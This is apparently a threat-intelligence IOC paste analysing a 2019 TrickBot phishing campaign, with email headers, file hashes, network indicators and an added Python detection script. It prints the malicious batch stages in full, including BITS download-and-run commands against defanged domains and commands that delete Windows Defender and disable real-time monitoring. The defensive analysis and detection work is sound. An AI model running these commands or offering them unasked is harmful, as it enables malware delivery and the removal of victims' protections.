VRad

#trickbot_070319

Mar 10th, 2019
#IOC #OptiData #VR #trickbot #W97M #AutoClose #BAT #BITS

https://pastebin.com/Vt02288z

previous contact:
06/02/19 https://pastebin.com/70KhU3a4
05/10/18 https://pastebin.com/75KNqwCf
02/10/18 https://pastebin.com/fm5Ug69G
24/09/18 https://pastebin.com/LjuNyGfn

FAQ:
https://radetskiy.wordpress.com/2018/10/19/ioc_trickbot_051018/
https://myonlinesecurity.co.uk/fake-paychex-tax-verification-documents-delivers-trickbot/
https://github.com/DidierStevens/DidierStevensSuite/blob/master/vba.yara

attack_vector
--------------
email attach .doc > macro_AutoClose > 4 bat > BITS > GET > AppData\Roaming\wnetwork\*.exe

email_headers
--------------
Received: from paychex.email ([95.211.163.2])
Received: by paychex.email for <user00@org88.victim0.com>;
(envelope-from <J.Clark-user00=org88.victim0.com@paychex.email>)
Subject: RE: Tax verification documents
From: "Jeff Clark - Paychex" <J.Clark@paychex.email>
Date: Thu, 7 Mar 2019 14:33:37 -0500
To: user00@org88.victim0.com

files
--------------
SHA-256 a2ee9205643518f97d02ba0a70105a920c316b599755439b03f20433eecff625
File name Verification_Documents.doc [Composite Document File V2 Document, Little Endian]
File size 100.5 KB

SHA-256 da252efc670493820e953a0472959d21ca2dd85b2d4ed25b693d1ced25a02fbd
File name za.ebali [PE32 executable (GUI) Intel 80386, for MS Windows]
File size 245 KB

activity
**************
Yahhop1.bat
--------------
cmd /r cmd /c copy /Y /V %windir%\system32\bitsadmin.exe %temp%\@n10FGA.exe && %temp%\Yahhop2.bat && %temp%\Yahhop3.bat && %temp%\Yahhop4.bat

Yahhop2.bat
--------------
cmd /r cmd /c ping -n 2 yasgold{.} com
if %errorlevel%==0 (set slomw=yasgold{.} com) else (set slomw=mitreart{.} com)

Yahhop3.bat
--------------
cmd /r cmd /c %temp%\@n10FGA /reset && %temp%\@n10FGA /CREATE /DOWNLOAD Taur && %temp%\@n10FGA /setNoProgressTimeout Taur 300 && %temp%\@n10FGA /setMinRetryDelay Taur 7 && %temp%\@n10FGA /ADDFILE Taur http://%slomw%/za.ebali %temp%\ebali.exe && %temp%\@n10FGA /SetSecurityFlags Taur 30 && %temp%\@n10FGA /SETMAXDOWNLOADTIME Taur 500 && %temp%\@n10FGA /SetPeerCachingFlags Taur 3 && %temp%\@n10FGA /RESUME Taur && timeout /t 147 /nobreak && %temp%\@n10FGA /COMPLETE Taur

Yahhop4.bat
--------------
cmd /r cmd /c timeout /t 5 /nobreak && %temp%\ebali.exe && del /f /q %temp%\Yahhop1.bat %temp%\Yahhop2.bat %temp%\Yahhop3.bat %temp%\Yahhop4.bat %temp%\Yahhop5.bat %temp%\@n10FGA.exe

@

PL_SRC: http://yasgold{.} com/za.ebali
http://mitreart{.} com/za.ebali

netwrk
--------------
http
185.56.145.142 yasgold{.} com HEAD /za.ebali HTTP/1.1 Microsoft BITS/7.5
116.203.16.95 ip.anysrc.net GET /plain HTTP/1.1 Mozilla/5.0
67.27.235.254 ctldl.windowsupdate.com GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1 Microsoft-CryptoAPI/6.1

ssl
185.174.174.15
82.146.57.38
195.123.246.121

comp
--------------
svchost.exe 872 TCP localhost 49376 185.56.145.142 80 ESTABLISHED
svchost.exe 1688 TCP localhost 49377 116.203.16.95 80 ESTABLISHED
svchost.exe 1688 TCP localhost 49378 177.107.51.162 449 SYN_SENT
svchost.exe 1688 TCP localhost 49381 138.204.132.88 449 SYN_SENT
svchost.exe 1688 TCP localhost 49385 67.27.235.254 80 ESTABLISHED
svchost.exe 1688 TCP localhost 49384 185.174.174.15 443 ESTABLISHED
svchost.exe 1688 TCP localhost 49386 82.146.57.38 443 ESTABLISHED
svchost.exe 1688 TCP localhost 49389 195.123.246.121 443 ESTABLISHED

proc
--------------
1st
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
C:\Windows\SysWOW64\cmd.exe cmd /r cmd /c copy /Y /V %windir%\system32\bitsadmin.exe %temp%\00JO0!l.exe && %temp%\Yahhop2.bat && %temp%\Yahhop3.bat && %temp%\Yahhop4.bat
C:\Windows\SysWOW64\cmd.exe /c copy /Y /V C:\Windows\system32\bitsadmin.exe C:\tmp\00JO0!l.exe
C:\Windows\SysWOW64\cmd.exe /r cmd /c ping -n 2 yasgold{.} com
C:\Windows\SysWOW64\cmd.exe /c ping -n 2 yasgold{.} com
C:\Windows\SysWOW64\PING.EXE -n 2 yasgold{.} com
C:\Windows\SysWOW64\cmd.exe /r cmd /c C:\tmp\00JO0!l /reset
C:\Windows\SysWOW64\cmd.exe /c C:\tmp\00JO0!l /reset
C:\tmp\00JO0!l /reset

C:\tmp\00JO0!l /CREATE /DOWNLOAD Taur
C:\tmp\00JO0!l /setNoProgressTimeout Taur 300
C:\tmp\00JO0!l /setMinRetryDelay Taur 7
C:\tmp\00JO0!l /ADDFILE Taur http://yasgold{.} com/za.ebali C:\tmp\ebali.exe
C:\tmp\00JO0!l /SetSecurityFlags Taur 30
C:\tmp\00JO0!l /SETMAXDOWNLOADTIME Taur 500
C:\tmp\00JO0!l /SetPeerCachingFlags Taur 3
C:\tmp\00JO0!l /RESUME Taur
C:\Windows\SysWOW64\timeout.exe timeout /t 147 /nobreak
C:\tmp\00JO0!l /COMPLETE Taur

C:\Windows\SysWOW64\cmd.exe /r cmd /c timeout /t 5 /nobreak
C:\tmp\ebali.exe
C:\Windows\system32\cmd.exe /c sc stop WinDefend
C:\Windows\system32\cmd.exe /c sc delete WinDefend
C:\Windows\system32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Users\operator\AppData\Roaming\wnetwork\ebamj.exe
C:\Windows\system32\cmd.exe /c sc stop WinDefend
C:\Windows\system32\cmd.exe /c sc delete WinDefend
C:\Windows\system32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\svchost.exe

2nd
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\taskeng.exe {4A5E0F1F-7A3C-4339-A10A-8292EA54F4A0} S-1-5-21-136527031-2493574210-1221074019-1000:APM11\operator:Interactive:[1]
C:\Users\operator\AppData\Roaming\wnetwork\ebamj.exe
C:\Windows\system32\cmd.exe /c sc stop WinDefend
C:\Windows\system32\cmd.exe /c sc delete WinDefend
C:\Windows\system32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\svchost.exe

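A small detection pass over process-creation records, added here as an example and not part of the original IOC dump: it tags the four behaviours the activity and proc sections show (Word spawning cmd.exe, bitsadmin.exe copied under a new name, a BITS /ADDFILE job writing straight to an .exe, and the Defender tampering that follows ebali.exe). The sample records are constructed from the proc list above; the download host is a placeholder, not the real distribution domain.

```python
import re

# BITS verbs from the Yahhop3.bat stage; used to spot bitsadmin run under a renamed copy.
BITS_VERBS = ("/create", "/download", "/addfile", "/setsecurityflags", "/resume", "/complete")
OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe")
SHELLS = ("cmd.exe", "powershell.exe")

def classify(parent, image, cmdline):
    """Return the detection tags that fire for one (parent, image, cmdline) record."""
    low, img = cmdline.lower(), image.lower().rsplit("\\", 1)[-1]
    tags = []
    # 1. Office application spawning a shell (macro_AutoClose -> .bat stage).
    if parent.lower().rsplit("\\", 1)[-1] in OFFICE_APPS and img in SHELLS:
        tags.append("office_spawns_shell")
    # 2. bitsadmin.exe copied out of system32 under a different name (Yahhop1.bat).
    m = re.search(r"copy\s+(?:/\S+\s+)*\S*bitsadmin\.exe\s+(\S+)", low)
    if m and not m.group(1).endswith("bitsadmin.exe"):
        tags.append("bitsadmin_renamed_copy")
    # 3. BITS verbs executed by an image that is not bitsadmin.exe (the renamed copy).
    if any(v in low for v in BITS_VERBS) and img != "bitsadmin.exe":
        tags.append("bits_verbs_outside_bitsadmin")
    # 4. A BITS job writing a remote file straight to an .exe (Yahhop3.bat /ADDFILE).
    if re.search(r"/addfile\s+\S+\s+https?://\S+\s+\S+\.exe", low):
        tags.append("bits_download_to_exe")
    # 5. Windows Defender tampering, as seen right after ebali.exe runs.
    if re.search(r"\bsc\s+(stop|delete)\s+windefend\b", low):
        tags.append("defender_service_tamper")
    if "set-mppreference" in low and "-disablerealtimemonitoring" in low:
        tags.append("defender_realtime_disabled")
    return tags

def scan(records):
    """Run classify over every record and return [(image, tags)] for those that fire."""
    hits = [(image, classify(parent, image, cmd)) for parent, image, cmd in records]
    return [(image, tags) for image, tags in hits if tags]

# Constructed records modelled on the proc section above (parent image, image, command
# line); the download host is a placeholder, not the real distribution domain.
SAMPLE_RECORDS = [
    (r"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE", r"C:\Windows\SysWOW64\cmd.exe",
     r"cmd /r cmd /c copy /Y /V %windir%\system32\bitsadmin.exe %temp%\00JO0!l.exe && %temp%\Yahhop2.bat"),
    (r"C:\Windows\SysWOW64\cmd.exe", r"C:\tmp\00JO0!l.exe",
     r"C:\tmp\00JO0!l /ADDFILE Taur http://dl.example.invalid/za.ebali C:\tmp\ebali.exe"),
    (r"C:\tmp\ebali.exe", r"C:\Windows\system32\cmd.exe", r"cmd /c sc delete WinDefend"),
    (r"C:\tmp\ebali.exe", r"C:\Windows\system32\cmd.exe",
     r"cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true"),
    (r"C:\Windows\explorer.exe", r"C:\Windows\system32\bitsadmin.exe",  # benign control
     r"bitsadmin /transfer job /download /priority normal http://dl.example.invalid/a.cab C:\tmp\a.cab"),
]
```

The ordinary bitsadmin transfer in the last record yields no tags, so the rules key on the renamed copy and the .exe destination rather than on BITS use as such.
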
persist
--------------
\Windows Network
c:\users\operator\appdata\roaming\wnetwork\ebamj.exe 07.03.2019 18:12

drop
--------------
C:\tmp\VBE\MSForms.exd
C:\tmp\Yahhop1.bat [removed]
C:\tmp\Yahhop2.bat [removed]
C:\tmp\Yahhop3.bat [removed]
C:\tmp\Yahhop4.bat [removed]
C:\tmp\00JO0!l.exe [removed]
C:\tmp\BIT7B59.tmp [removed]
C:\tmp\ebali.exe

C:\Users\operator\AppData\Roaming\wnetwork\ebamj.exe
C:\Users\operator\AppData\Roaming\wnetwork\Greenshot.ini
C:\Users\operator\AppData\Roaming\wnetwork\Data

# # #
https://www.virustotal.com/#/file/a2ee9205643518f97d02ba0a70105a920c316b599755439b03f20433eecff625/details
https://www.virustotal.com/#/file/da252efc670493820e953a0472959d21ca2dd85b2d4ed25b693d1ced25a02fbd/details
https://analyze.intezer.com/#/analyses/b11279cb-4c9a-4e59-8605-e6a96c078034

VR

@